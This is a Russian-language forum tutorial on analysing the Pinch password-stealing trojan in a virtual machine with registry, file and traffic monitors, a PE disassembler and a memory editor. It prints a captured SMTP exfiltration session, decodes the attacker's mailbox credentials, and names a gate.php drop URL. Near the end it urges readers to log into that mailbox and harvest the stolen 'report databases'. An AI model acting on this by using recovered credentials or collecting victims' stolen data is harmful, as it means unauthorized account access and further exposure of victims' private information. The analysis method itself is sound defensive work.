melsi
Сообщений: 21
Оценки: 0
Присоединился: 2010-12-24 00:23:29.273333
|
Тема старенькая, но может кому и пригодится.
Введение
Троян Pinch (в данной статье был взят он) можно настроить и закриптовать за несколько секунд. При его запуске все ваши пароли к почте, аське, ftp, сохраненные пароли форм браузера, системная информация, история, куки сайтов и многое другое уйдут на электронный адрес злоумышленника. Хотелось бы выяснить, что конкретно ушло и куда, а возможно и наказать троянщика.
Инструменты
1) Виртуальная машина - VMware
Процесс исследования вредоносных программ не безопасен и может повлечь порчу и утрату информации, поэтому в качестве среды анализа будем использовать виртуальную машину. В ней мы можем проводить любые изменения, которые не затронут основную ОС.
2) Мониторы реестра и файловой системы - RegMon и FileMon
Нужны, для подробного исследования обращений к реестру и файлам.
3) Анализатор изменений реестра - RegShot
Одна из самых полезных программ, позволяет узнать как работает троян, куда прячет автозапуск, как обходит фаерволы и т.д.
4) Анализатор сетевого трафика - Iris, CommView
Позволит определить куда уходят отчеты троя и через что.
Iris и CommView удобны тем, что распознают огромное количество протоколов и умеют налету декодировать пакеты. Отличия у них в том, что Iris сортирует пакеты по портам, а CommView по приложениям. Т.е. если вы не знаете, как будет называться троян после расклейки (сджойненный), то лучше использовать Iris, если имя вредоносной программы известно заранее, то лучше использовать CommView. Вообще можно использовать любой доступный сниффер, тот же Wp3pr0, но он изначально создан не для анализа, а для подмены пакетов.
5) Анализатор PE файлов (EXE, DLL, SYS, DRV…) - PE Explorer
В случае если трафик передается в зашифрованном виде, или просто не ловится сниферами позволит вытащить полезную информацию.
6) Редактор памяти - WinHex
И наконец, если трафик не ловится, а файл криптован, нам понадобится редактор памяти.
7) Сама вредоносная программа
Без комментариев
Где взять?
конечно же помогут Яндекс с Гуглем.
Виртуальная машина
1) Устанавливаем VMware
2) Жмем в ней File->New->VirtualMachine (Ctrl+N)
3) Для возможности выхода в инет установим необходимые настройки.
4) Выделим 6 Гб на жестком диске
5) После создания виртуальной машины настроим необходимые виртуальные устройства (жмем Edit Virtual Machine Settings)
6) Добавим по возможности оперативной памяти (Memory)
7) У виртуального CD-Rom выберем реальный CD/DVD, чтоб было с чего устанавливать ОС.
8) Добавим USB контроллер (Add->USB Controller) чтобы передавать данные с реальной на виртуальную машину через флешку, или как вариант, можно создать виртуальный диск из папки на винте.
9) Запустим виртуальную машину (Start this Virtual Machine)
10) Устанавливаем ОС как на обычный комп.
11) Копируем все вышеперечисленные инструменты на флэшку.
12) В виртуальной машине выбираем VM->Removable Devices->USB Devices и выбираем название нашей флешки, теперь ее видит виртуальная машина.
13) Копируем инструменты с флешки на виртуальную машину
14) Устанавливаем все программы кроме RegMon, FileMon, RegShot (не требуют установки), сам троян тоже пока не запускаем
15) Теперь когда система полностью настроена и все нужные проги установлены жмем на кнопку Take Snapshot of VirtualMachin при ее нажатии создастся снимок всей виртуальной машины и какие бы мы изменения ни проводили, всегда можно будет вернуть систему к исходному состоянию.
Исследование
1) RegShot необходима для просмотра изменений в реестр, для начала запустим ее и сделаем «снимок» реестра до запуска вредоносной программы
2) Запустим программу RegMon, отслеживающую обращения к реестру, в качестве фильтра установим название запускаемого вредоносного файла.
3) Аналогично запустим и настроим программу FileMon, отслеживающую обращения к файловой системе.
4) Запустим IRIS – программу анализа сетевого трафика и нажмем Start (Ctrl+A)
5) И наконец, запустим саму вредоносную программу
6) Сделаем второй «снимок» в программе RegShot и посмотрим на внесенные изменения
На основе данного отчета можно понять, что троян добавляет себя в автозагрузку, а также в «белые листы» распространенных фаерволлов для беспрепятственной отправки данных злоумышленнику.
7) На основе отчетов программ RegMon и FileMone можно увидеть, что данный троян собирает личную информацию пользователя (пароли, cookies, историю просмотра, информацию о системе и т.д.)
8) В Iris жмем на Stop (Ctrl+Z), затем Decode и смотрим, какие данные передавались во время запуска трояна.
На данном скрине видим, что по почтовому протоколу SMTP на почтовый адрес злоумышленника с другой его почтовой учетной записи отправляется письмо с вложением report.bin (скорее всего сам отчет)
Более того в отчете видим исходящий почтовый сервер и строку авторизации (AUTHPLAIN) а зная что протокол smtp использует для mime кодирования данных алгоритм BASE64 без труда получаем логин и пароль аккаунта, с которого происходит отправка отчетов.
Например, получили следующую авторизационную часть пакета:
Код:
220 mail.ru ESMTP Wed, 14 May 2008 18:42:55 +0400
EHLO 1-7f4589a43fe42
250-mx39.mail.ru Hello 1-7f4589a43fe42 [75.45.2.173]
250-SIZE 31457280
250-8BITMIME
250-AUTH PLAIN LOGIN
250 PIPELINING
AUTH PLAIN b3V0aGFja2VyBGpoZDMzZ2ZzZA==
235 Authentication succeeded
MAIL FROM:
250 OK
RCPT TO:
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
Date: Wed, 14 May 2008 18:42:55 +0400
From: =?KOI8-R?Q??=
To: inhacker@mail.ru
Subject: Report
Message-Id: <20080514184255.ee661f0c.outhacker@list.ru>
Нас интересуют следующие строки:
AUTH PLAIN b3V0aGFja2VyBGpoZDMzZ2ZzZA== строка передачи данных авторизации
To: inhacker@mail.ru отсюда получаем, куда ушел отчет
Message-Id: <20080514184255.ee661f0c.outhacker@list.ru> через какой адрес посылали
Идем на _http://www.opinionatedgeek.com/dotnet/tools/base64decode/ копируем данную строку AUTH PLAIN b3V0aGFja2VyBGpoZDMzZ2ZzZA== и выбираем Decode, получаем outhacker jhd33gfsd логин и пароль мыла, через которое отправляется отчет.
Теперь зайдя на почтовый сервер мы можем сменить пароль на его учетной записи, тем самым сделав работу трояна в дальнейшем невозможной. Более того, есть шанс, что пароль к мылу получателя отчетов такой же, тогда если письма с сервера не удаляются, получим базу с отчетами
9) К сожалению, встречаются вредоносные программы, работающие в обход сетевых анализаторов, тогда нам на помощь приходит программа PE Explorer.
Открываем наш троян через PE Explorer и жмем на кнопку Disassembler (Ctrl+M).
В появившемся окошке жмем Start Now, получаем наш троян в ассемблерном коде, удобно разложенный по категориям, что выгодно отличает его от других дизассемблеров.
Выбираем вкладку Strings (Строки) и ищем через Find (Ctrl+F) части строк вроде .ru .com @.
Первым же проходом по символу "@" поиск дал в моем случае аналогичный результат:
smtp.list.ru
outhacker
jhd33gfsd
inhacker@mail.ru
10) Но часто бывает и так, что строки зашифрованы, или до них вообще нельзя добраться из-за того что троян сжат\закриптован.
Тут конечно можно повозиться с расжатием\раскриптовкой, но крипторов и пакеров великое разнообразие, да и переписать под себя не долго.
В данном случае, когда сетевой анализатор не ловит пакеты трояна, а сам троян зашифрован нам пригодится WinHex, точнее его часть-редактор памяти. Для того, чтобы сделать захват процесса трояна отключим интернет соединение VMware. И еще раз запустим наш троян.
В WinHex выбираем Open RAM (Alt+F9) из списка процессов ищем трояна и название его exe файла.
Сделав захват процесса с трояном, а затем сделав поиск (Ctrl+F) по .ru .com можно получить аналогичную информацию о том, куда отправляет информацию вредоносная программа.
В данном случае получили, что троян шлет свои отчеты через скрипт _aumoch.hocomua.ru/gate3/gate.php (обведено красным).
Куда конкретно шлет, в данном случае выяснить нельзя, если только не договориться с админом hocomua.ru
Наказать троянщика опять же можно только через админов данного сайта, т.к. обычно такие скрипты размещают на халявном хостинге.
Ниже в памяти идут параметры скрипта (обведены зеленым), но не стоит обращать на них особое внимание, при посылке через можно указать любое мыло отправителя, т.е. скорее всего адреса poshli_v@zho.pu не существует.
11) После окончания исследования можно с чистой совестью нажать в VMware на кнопку Revert Snapshot и восстановить систему к прежнему состоянию.
Анализ троянов данными методами не ограничивается, простор для фантазии огромен, но и этих знаний вполне хватит, чтоб поохотиться за халявными базами отчетов.
|
Небольшое FAQ по анализу деятельности Троянов. - 
